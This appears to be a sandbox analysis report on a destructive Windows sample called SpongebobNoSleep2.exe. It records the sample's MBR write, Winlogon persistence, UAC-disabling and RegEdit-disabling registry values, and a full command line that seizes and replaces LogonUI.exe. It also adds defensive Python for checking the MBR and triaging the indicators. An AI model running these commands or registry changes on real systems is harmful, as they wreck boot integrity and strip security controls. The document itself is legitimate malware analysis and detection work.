Analysis
max time kernel: 507s
max time network: 515s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-07-2024 04:59
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: http://google.com
Resource: win10v2004-20240611-en
Errors
General
Target: http://google.com
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
  gdifuncs.exe | Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\""
Winlogon's Shell value is a comma-separated list, so explorer.exe still starts and wscript.exe is launched with the dropped VBS at every logon. The write landed in the WOW6432Node (32-bit) view of the key, which is what happens when a 32-bit process writes it; the 64-bit winlogon.exe reads the native view, so confirm which view actually holds the value before treating this as working persistence, and check both views when cleaning up.
Processes:
  gdifuncs.exe | Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
ConsentPromptBehaviorAdmin = 0 makes UAC elevate members of Administrators without any prompt. The signature heading for this entry is not present in the extracted page; the same IoC is listed again under "System policy modification" below.
Disables RegEdit via registry modification 1 IoCs
Processes:
  gdifuncs.exe | Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"
This is written under the sandbox user's HKCU hive (SID ending in -1000), so it affects only that profile.
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 4 IoCs
Processes:
  pid   process
  5076  takeown.exe
  1460  icacls.exe
  1396  takeown.exe
  4048  icacls.exe
takeown.exe followed by icacls.exe is the standard pattern for seizing ownership of a protected file and then rewriting its ACL. The command lines are not included in this report, so the target paths are unknown.
Checks computer location settings 2 TTPs 2 IoCs
Reads the GeoID (a numeric country code) stored under Control Panel\International\Geo\Nation, a common geofencing check.
Processes:
  wscript.exe   | Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation
  gdifuncs.exe  | Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation
Executes dropped EXE 3 IoCs
Processes:
  pid   process
  524   mbr.exe
  816   MainWindow.exe
  2408  gdifuncs.exe
Modifies file permissions 1 TTPs 4 IoCs
Processes:
  pid   process
  5076  takeown.exe
  1460  icacls.exe
  1396  takeown.exe
  4048  icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
Network flows:
  flow 282  camo.githubusercontent.com
  flow 283  camo.githubusercontent.com
  flow 287  camo.githubusercontent.com
  flow 300  raw.githubusercontent.com
  flow 301  raw.githubusercontent.com
  flow 302  raw.githubusercontent.com
raw.githubusercontent.com serves raw file content from GitHub repositories and camo.githubusercontent.com is GitHub's image proxy, so the sample is fetching content from a GitHub-hosted repository. The request paths, which would identify that repository, are not part of this report.
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
  mbr.exe | File opened for modification | \??\PhysicalDrive0
Opening \??\PhysicalDrive0 for write is raw access to the whole disk and requires administrator rights; anything written at offset 0 replaces the bootstrap code and partition table the firmware boots from.
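Confirming whether the first sector was actually changed is the natural follow-up to this signature. The Python below is an added example for this page, not code from the sandbox report or from the sample: it parses a 512-byte MBR, validates the 0x55AA boot signature, decodes the partition table and compares a SHA-256 of the 440-byte bootstrap area against a known-good baseline. The sample sectors, the disk signature 0x1234ABCD, the single NTFS partition and the baseline hash are all constructed for the demo; on a live Windows host the sector would come from \\.\PhysicalDrive0 (administrator rights required) via read_first_sector, which is defined but not called here.

```python
"""Parse and sanity-check a 512-byte Master Boot Record (offline example)."""
import hashlib
import struct
from typing import Dict, List

SECTOR = 512
BOOTCODE_LEN = 440        # 0x000-0x1B7: bootstrap code, the part a bootkit replaces
DISK_SIG_OFF = 0x1B8      # 4-byte NT disk signature
PART_TABLE_OFF = 0x1BE    # four 16-byte partition entries
BOOT_SIG_OFF = 0x1FE      # 0x55 0xAA
_PART_FMT = "<B3xB3xII"   # status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count


def parse_mbr(sector: bytes) -> Dict:
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly 512 bytes")
    partitions = []
    for i in range(4):
        status, ptype, lba, count = struct.unpack_from(_PART_FMT, sector, PART_TABLE_OFF + 16 * i)
        if ptype:                                      # type 0 = unused slot
            partitions.append({"index": i, "bootable": status == 0x80,
                               "type": ptype, "lba_start": lba, "sectors": count})
    return {
        "boot_signature_ok": sector[BOOT_SIG_OFF:BOOT_SIG_OFF + 2] == b"\x55\xaa",
        "disk_signature": struct.unpack_from("<I", sector, DISK_SIG_OFF)[0],
        "bootcode_sha256": hashlib.sha256(sector[:BOOTCODE_LEN]).hexdigest(),
        "partitions": partitions,
    }


def assess(sector: bytes, baseline_bootcode_sha256: str) -> List[str]:
    """Human-readable findings; an empty list means the sector matches the baseline."""
    info = parse_mbr(sector)
    findings = []
    if not info["boot_signature_ok"]:
        findings.append("boot signature 0x55AA missing: sector wiped or corrupt")
    if info["bootcode_sha256"] != baseline_bootcode_sha256:
        findings.append("bootstrap code differs from baseline: possible bootkit or wiper")
    if not info["partitions"]:
        findings.append("partition table empty")
    return findings


def read_first_sector(path: str = r"\\.\PhysicalDrive0") -> bytes:
    """Live read on Windows (administrator required). Not called in the offline demo below."""
    with open(path, "rb") as f:
        return f.read(SECTOR)


def build_sample_mbr(bootcode: bytes) -> bytes:
    """Constructed MBR: the given bootstrap bytes, a made-up disk signature and one NTFS partition."""
    sec = bytearray(SECTOR)
    sec[:BOOTCODE_LEN] = bootcode[:BOOTCODE_LEN].ljust(BOOTCODE_LEN, b"\x00")
    struct.pack_into("<I", sec, DISK_SIG_OFF, 0x1234ABCD)
    struct.pack_into(_PART_FMT, sec, PART_TABLE_OFF, 0x80, 0x07, 2048, 204800)  # bootable, NTFS, 100 MiB
    sec[BOOT_SIG_OFF:BOOT_SIG_OFF + 2] = b"\x55\xaa"
    return bytes(sec)


# Stand-in "known good" loader stub: the usual opening instructions of an MBR
# (xor ax,ax / mov ss,ax / mov sp,0x7C00) padded with NOPs. Constructed, not a real Windows MBR.
CLEAN_MBR = build_sample_mbr(bytes.fromhex("33c08ed0bc007c") + b"\x90" * (BOOTCODE_LEN - 7))
BASELINE_SHA256 = parse_mbr(CLEAN_MBR)["bootcode_sha256"]

# Simulated bootkit write: bootstrap area replaced (here with a "jmp $" hang) while the
# partition table and signature are left intact, so a partition tool still sees a normal disk.
TAMPERED_MBR = build_sample_mbr(b"\xeb\xfe")

if __name__ == "__main__":
    for label, sec in (("clean", CLEAN_MBR), ("tampered", TAMPERED_MBR), ("wiped", bytes(SECTOR))):
        print(label, assess(sec, BASELINE_SHA256) or "OK")
```

The tampered case is the one worth noticing: the partition table still parses identically to the clean sector, so only the bootcode hash comparison reveals the write. A baseline therefore has to be captured from a known-clean image of the same machine (or the vendor's MBR stub), not inferred from the disk under examination.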
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
  reg.exe | Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp"
Drops file in Windows directory 6 IoCs
Processes:
  cmd.exe       | File created                 | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe
  cmd.exe       | File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe
  cmd.exe       | File created                 | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav
  cmd.exe       | File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav
  gdifuncs.exe  | File created                 | C:\windows\WinAttr.gci
  cmd.exe       | File opened for modification | \??\c:\windows\WinAttr.gci
Creating files directly under C:\windows requires an elevated token; together with the successful raw disk write and the takeown/icacls activity this indicates the sample ran with administrator rights in the sandbox.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
  pid   process
  2080  timeout.exe
Kills process with taskkill 1 IoCs
Processes:
  pid   process
  4744  taskkill.exe
Modifies Control Panel 3 IoCs
Processes:
  gdifuncs.exe | Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur"
  gdifuncs.exe | Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur"
  gdifuncs.exe | Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur"
Modifies registry class 1 IoCs
Processes:
  msedge.exe | Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3665033694-1447845302-680750983-1000\{AD0C075B-9A33-4142-9876-1601B4A20A80}
This entry is Edge's own AppModel package bookkeeping from opening the submitted URL, not activity of the sample.
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid   process
  2408  gdifuncs.exe  (all 64 listed events)
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
  process       pid   privilege
  AUDIODG.EXE   3408  Token: 33
  AUDIODG.EXE   3408  Token: SeIncBasePriorityPrivilege
  gdifuncs.exe  2408  Token: SeDebugPrivilege  (2 events)
  takeown.exe   5076  Token: SeTakeOwnershipPrivilege
  takeown.exe   1396  Token: SeTakeOwnershipPrivilege
  taskkill.exe  4744  Token: SeDebugPrivilege
The AUDIODG.EXE entries are the Windows audio engine adjusting its own priority and are expected noise; the SeDebugPrivilege enable in the dropped gdifuncs.exe and the SeTakeOwnershipPrivilege enables in takeown.exe are the entries that matter.
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
  pid   process
  816   MainWindow.exe  (all 64 listed events)
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
  pid   process
  3444  SpongebobNoSleep2.exe
  816   MainWindow.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Processes (64 events listed; the listing stops at 64 entries, so later writes are not shown):
  source pid  source                 target pid(s)                                                   target        events
  3444        SpongebobNoSleep2.exe  1556                                                            wscript.exe   2
  1556        wscript.exe            524                                                             mbr.exe       3
  1556        wscript.exe            60                                                              cmd.exe       2
  60          cmd.exe                2392                                                            reg.exe       2
  60          cmd.exe                452, 980, 4244, 3284, 4440, 3388, 5104, 5084, 3712, 1512,        rundll32.exe  55
                                     4348, 3272, 2864, 996, 1000, 3752, 4276, 1600, 4584, 3816,
                                     2716, 3532, 2620, 2748, 3520, 2268, 5020, 1444 (1444: 1 event)
Every pair here is a parent writing into a child it has just created, which is what CreateProcess does when it sets up the new process; the events map the launch chain rather than showing injection into unrelated processes.
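Because every WriteProcessMemory pair above is a parent writing into its own freshly created child, the events double as a process-creation log. The Python below is an added example, not part of the report: it consumes text in the report's own "PID <src> wrote to memory of <dst> <src> <src image> <dst image>" layout (including the run-together single-line form the page uses), collapses the duplicate events into parent-to-child edges with counts, walks the lineage of any PID back to the root, and counts distinct children per parent/child image pair, which is where one cmd.exe spawning dozens of rundll32.exe stands out. The input is a constructed subset of this report's events.

```python
"""Rebuild process lineage from a sandbox's WriteProcessMemory events (added example)."""
import re
from collections import Counter
from typing import Dict, List, Set, Tuple

Edge = Tuple[int, str, int, str]   # (src pid, src image, dst pid, dst image)

_WPM_RE = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) (?P<src_name>\S+) (?P<dst_name>\S+)"
)


def parse_edges(text: str) -> Counter:
    """Count WriteProcessMemory events per (parent, child) pair; works on run-together lines."""
    edges: Counter = Counter()
    for m in _WPM_RE.finditer(text):
        edges[(int(m["src"]), m["src_name"], int(m["dst"]), m["dst_name"])] += 1
    return edges


def lineage(edges: Counter, pid: int) -> List[str]:
    """Images from the root of the tree down to pid, formatted as 'image(pid)'."""
    parent: Dict[int, int] = {}
    name: Dict[int, str] = {}
    for src, src_name, dst, dst_name in edges:
        parent[dst] = src
        name[src], name[dst] = src_name, dst_name
    if pid not in name:
        raise KeyError(f"pid {pid} not seen in events")
    chain = [pid]
    while chain[-1] in parent and len(chain) < 64:   # length guard against cyclic input
        chain.append(parent[chain[-1]])
    return [f"{name[p]}({p})" for p in reversed(chain)]


def fanout(edges: Counter) -> Dict[Tuple[str, str], int]:
    """Number of distinct child PIDs per (parent image, child image)."""
    children: Dict[Tuple[str, str], Set[int]] = {}
    for src, src_name, dst, dst_name in edges:
        children.setdefault((src_name, dst_name), set()).add(dst)
    return {pair: len(pids) for pair, pids in children.items()}


# Constructed input: a subset of this report's events, pasted as one line the way the page renders them.
SAMPLE_EVENTS = (
    "PID 3444 wrote to memory of 1556 3444 SpongebobNoSleep2.exe wscript.exe "
    "PID 3444 wrote to memory of 1556 3444 SpongebobNoSleep2.exe wscript.exe "
    "PID 1556 wrote to memory of 524 1556 wscript.exe mbr.exe "
    "PID 1556 wrote to memory of 524 1556 wscript.exe mbr.exe "
    "PID 1556 wrote to memory of 524 1556 wscript.exe mbr.exe "
    "PID 1556 wrote to memory of 60 1556 wscript.exe cmd.exe "
    "PID 1556 wrote to memory of 60 1556 wscript.exe cmd.exe "
    "PID 60 wrote to memory of 2392 60 cmd.exe reg.exe "
    "PID 60 wrote to memory of 2392 60 cmd.exe reg.exe "
    "PID 60 wrote to memory of 452 60 cmd.exe rundll32.exe "
    "PID 60 wrote to memory of 452 60 cmd.exe rundll32.exe "
    "PID 60 wrote to memory of 980 60 cmd.exe rundll32.exe "
    "PID 60 wrote to memory of 4244 60 cmd.exe rundll32.exe"
)

if __name__ == "__main__":
    edges = parse_edges(SAMPLE_EVENTS)
    print(" -> ".join(lineage(edges, 2392)))
    for pair, n in sorted(fanout(edges).items()):
        print(f"{pair[0]} spawned {n} x {pair[1]}")
```

A WriteProcessMemory edge whose target was not created by the writer would break this model; if a child appears with two different parents, or a write targets a PID that never appears as a launched process, that is the case to look at as genuine injection rather than launch bookkeeping.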
System policy modification 1 TTPs 1 IoCs
Processes:
  gdifuncs.exe | Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
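The registry IoCs in the signatures above (the Winlogon Shell write, the ConsentPromptBehaviorAdmin and DisableRegistryTools policies, the Geo\Nation lookup, the Wallpaper and Cursors values) share one line layout and can be triaged mechanically. The Python below is an added example written for this page, not part of the sandbox report: it parses lines in the report's own "<op> (<type>) <key> = "<data>" <process>" form and attaches labels for the tampering patterns seen here. The label names are this example's own, not sandbox signature names; the input lines are copied from this report, with one of Edge's own key creations included as a control that should receive no label.

```python
"""Triage registry IoC lines from a sandbox report (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

_IOC_RE = re.compile(
    r'^(?P<op>Set value|Key value queried|Key created)'
    r'(?: \((?P<type>\w+)\))?'          # value type, present only for "Set value"
    r' (?P<key>.+?)'                    # key path; may contain spaces ("Windows NT", "Control Panel")
    r'(?: = "(?P<data>.*)")?'           # quoted data; absent for queries and key creation
    r' (?P<proc>\S+)$'                  # acting process image
)


@dataclass
class RegistryIoc:
    op: str
    vtype: Optional[str]
    key: str
    data: Optional[str]
    proc: str


def parse_ioc(line: str) -> RegistryIoc:
    m = _IOC_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised IoC line: {line!r}")
    return RegistryIoc(m["op"], m["type"], m["key"], m["data"], m["proc"])


def classify(ioc: RegistryIoc) -> List[str]:
    """Labels that apply to one IoC; an empty list means nothing in the rule set matched."""
    key = ioc.key.lower()
    data = (ioc.data or "").strip().lower()
    labels = []
    if key.endswith("\\winlogon\\shell") and ioc.op == "Set value":
        # Shell is a comma-separated list; anything besides explorer.exe runs at every logon.
        extras = [p.strip() for p in data.split(",") if p.strip() and p.strip() != "explorer.exe"]
        if extras:
            labels.append("winlogon-shell-persistence")
        if "\\wow6432node\\" in key:
            # Written through the 32-bit registry view; the native view must be checked separately.
            labels.append("wow64-redirected-write")
    if key.endswith("\\policies\\system\\consentpromptbehavioradmin") and data == "0":
        labels.append("uac-admin-prompt-disabled")      # 0 = elevate without prompting
    if key.endswith("\\policies\\system\\disableregistrytools") and data == "1":
        labels.append("regedit-disabled")
    if key.endswith("\\policies\\system\\disabletaskmgr") and data == "1":
        labels.append("taskmgr-disabled")
    if key.endswith("\\control panel\\desktop\\wallpaper"):
        labels.append("wallpaper-changed")
    if key.endswith("\\control panel\\international\\geo\\nation") and ioc.op == "Key value queried":
        labels.append("geo-nation-lookup")               # GeoID read, the usual geofence check
    if "\\control panel\\cursors\\" in key:
        labels.append("cursor-replaced")
    return labels


def triage(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(label, process, key) for every labelled IoC, in input order."""
    out = []
    for line in lines:
        ioc = parse_ioc(line)
        for label in classify(ioc):
            out.append((label, ioc.proc, ioc.key))
    return out


# Constructed input: IoC lines copied from this report, plus one benign Edge line as a control.
SAMPLE_LINES = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" gdifuncs.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" gdifuncs.exe',
    r'Set value (int) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" gdifuncs.exe',
    r'Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation wscript.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" reg.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe',
    r'Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3665033694-1447845302-680750983-1000\{AD0C075B-9A33-4142-9876-1601B4A20A80} msedge.exe',
]

if __name__ == "__main__":
    for label, proc, key in triage(SAMPLE_LINES):
        print(f"{label:30} {proc:14} {key}")
```

The Winlogon rule deliberately splits the data on commas instead of matching a fixed string, since the whole point of the technique is to append to a list that still contains explorer.exe; a rule that only looked for "explorer.exe" at the start of the value would miss it.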
Processes
The submitted target is http://google.com, so the msedge.exe entries in this first group are the sandbox opening that URL; the malicious chain begins with SpongebobNoSleep2.exe further down. The sandbox reported every entry in this group at depth 1.

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.com

msedge.exe helper processes (same image path). Every one carries --lang=en-US --field-trial-handle=<fth>,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=<mojo>. Renderers additionally carry --type=renderer --enable-dinosaur-easter-egg-alt-images --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 /prefetch:1 (plus --disable-gpu-compositing where marked); utilities carry --type=utility --utility-sub-type=<service> --service-sandbox-type=<sandbox> /prefetch:8. Listed in the order the sandbox reported them.

  type      detail                                                                             fth   mojo
  renderer  --renderer-client-id=16                                                            4276  3836
  renderer  --renderer-client-id=15                                                            4340  4496
  renderer  --renderer-client-id=17                                                            4100  5300
  utility   asset_store.mojom.AssetStoreService, sandbox asset_store_service                   5472  5484
  utility   entity_extraction_service.mojom.Extractor, sandbox entity_extraction, --onnx-enabled-for-ee   5356  5564
  renderer  --renderer-client-id=20, --disable-gpu-compositing                                 5912  5932
  utility   data_decoder.mojom.DataDecoderService, sandbox service                             5512  4992
  renderer  --renderer-client-id=22, --disable-gpu-compositing                                 1308  4656
  utility   data_decoder.mojom.DataDecoderService, sandbox service                             6448  6336
  utility   edge_search_indexer.mojom.SearchIndexerInterfaceBroker, sandbox search_indexer, --message-loop-type-ui   5752  5668
  renderer  --renderer-client-id=25, --disable-gpu-compositing                                 5496  6340
  renderer  --renderer-client-id=26, --disable-gpu-compositing                                 6164  6748
  utility   audio.mojom.AudioService, sandbox audio                                            6864  6896
  utility   video_capture.mojom.VideoCaptureService, sandbox none                              3860  6892   - Modifies registry class
  renderer  --renderer-client-id=29, --disable-gpu-compositing                                 6884  6620
  renderer  --renderer-client-id=30, --disable-gpu-compositing                                 7124  7036
  renderer  --renderer-client-id=31, --disable-gpu-compositing                                 6308  7020
  renderer  --renderer-client-id=32, --disable-gpu-compositing                                 6888  7016
  renderer  --renderer-client-id=33, --disable-gpu-compositing                                 3820  4684

C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x4e0 0x324
  - Suspicious use of AdjustPrivilegeToken

  type      detail                                                                             fth   mojo
  renderer  --renderer-client-id=34, --disable-gpu-compositing                                 6724  7016
  renderer  --renderer-client-id=35, --disable-gpu-compositing                                 7048  1040
  utility   edge_collections.mojom.CollectionsDataManager, sandbox collections                 7336  7348
  renderer  --renderer-client-id=37, --disable-gpu-compositing                                 6856  7456
  utility   chrome.mojom.FileUtilService, sandbox service                                      7628  7640
  utility   quarantine.mojom.Quarantine, sandbox none                                          7880  7908

C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

  type      detail                                                                             fth   mojo
  renderer  --renderer-client-id=40, --disable-gpu-compositing                                 7968  6452
  utility   chrome.mojom.FileUtilService, sandbox service                                      7992  7912
  utility   quarantine.mojom.Quarantine, sandbox none                                          8120  8108
  renderer  --renderer-client-id=43, --disable-gpu-compositing                                 8096  7344
  utility   chrome.mojom.FileUtilService, sandbox service                                      7524  7736
  utility   quarantine.mojom.Quarantine, sandbox none                                          8044  7600
  renderer  --renderer-client-id=46, --disable-gpu-compositing                                 8004  7100
  utility   chrome.mojom.FileUtilService, sandbox service                                      8156  8108
  utility   quarantine.mojom.Quarantine, sandbox none                                          7660  8104
  renderer  --renderer-client-id=49, --disable-gpu-compositing                                 8100  5596
  renderer  --renderer-client-id=50, --disable-gpu-compositing                                 5620  8160
  renderer  --renderer-client-id=51, --disable-gpu-compositing                                 7572  8132
  renderer  --renderer-client-id=52, --disable-gpu-compositing                                 5308  7580
  utility   chrome.mojom.FileUtilService, sandbox service                                      7560  5640
  utility   quarantine.mojom.Quarantine, sandbox none                                          1036  8128

The repeated FileUtilService/Quarantine pairs are the utility processes Edge spawns when it completes a download and applies the mark-of-the-web, and rundll32.exe with shell32.dll,SHCreateLocalServerRunDll is Explorer hosting a shell COM object out of process. Both are consistent with a zip being downloaded and opened, which is where the sample below is launched from, but the download itself is not shown in this report.
C:\Users\Admin\AppData\Local\Temp\Temp1_SpongeBobNoSleep2 (HorrorBob5).zip\SpongebobNoSleep2.exe
  "C:\Users\Admin\AppData\Local\Temp\Temp1_SpongeBobNoSleep2 (HorrorBob5).zip\SpongebobNoSleep2.exe"
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  The Temp1_<archive>.zip\ path is the staging directory Explorer's Compressed Folders uses when a file is run straight out of a zip without being extracted first.

    C:\Windows\system32\wscript.exe
      "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\797D.tmp\798E.tmp\798F.vbs //Nologo
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      Sysnative is the WOW64 alias that lets a 32-bit process reach the native 64-bit System32, so the dropper is 32-bit and deliberately launches the 64-bit script host.

        C:\Users\Admin\AppData\Local\Temp\797D.tmp\mbr.exe
          "C:\Users\Admin\AppData\Local\Temp\797D.tmp\mbr.exe"
          - Executes dropped EXE
          - Writes to the Master Boot Record (MBR)

        C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\797D.tmp\tools.cmd" "
          - Drops file in Windows directory
          - Suspicious use of WriteProcessMemory

            C:\Windows\system32\reg.exe
              reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
              - Sets desktop wallpaper using registry

            C:\Windows\system32\rundll32.exe  (35 separate processes with the identical command line)
              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
              UpdatePerUserSystemParameters re-reads the user's desktop settings so the wallpaper change takes effect immediately; the batch file evidently calls it in a loop.

        C:\Users\Admin\AppData\Local\Temp\797D.tmp\MainWindow.exe
          "C:\Users\Admin\AppData\Local\Temp\797D.tmp\MainWindow.exe"
          - Executes dropped EXE
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SetWindowsHookEx

The tree ends here in the extracted page; gdifuncs.exe, takeown.exe, icacls.exe, taskkill.exe and timeout.exe, which appear in the signatures above, are not shown in this portion.
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\gdifuncs.exe"C:\Users\Admin\AppData\Local\Temp\797D.tmp\gdifuncs.exe"3⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\windows\SysWOW64\takeown.exe"C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\windows\SysWOW64\icacls.exe"C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65© "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\takeown.exetakeown /f LogonUI.exe5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls LogonUI.exe /granted "Admin":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "tobi0a0c.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=6812,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=6604 /prefetch:81⤵
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Boot or Logon Autostart Execution (1)
  - Winlogon Helper DLL (1)
- Pre-OS Boot (1)
  - Bootkit (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Winlogon Helper DLL (1)
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
Downloads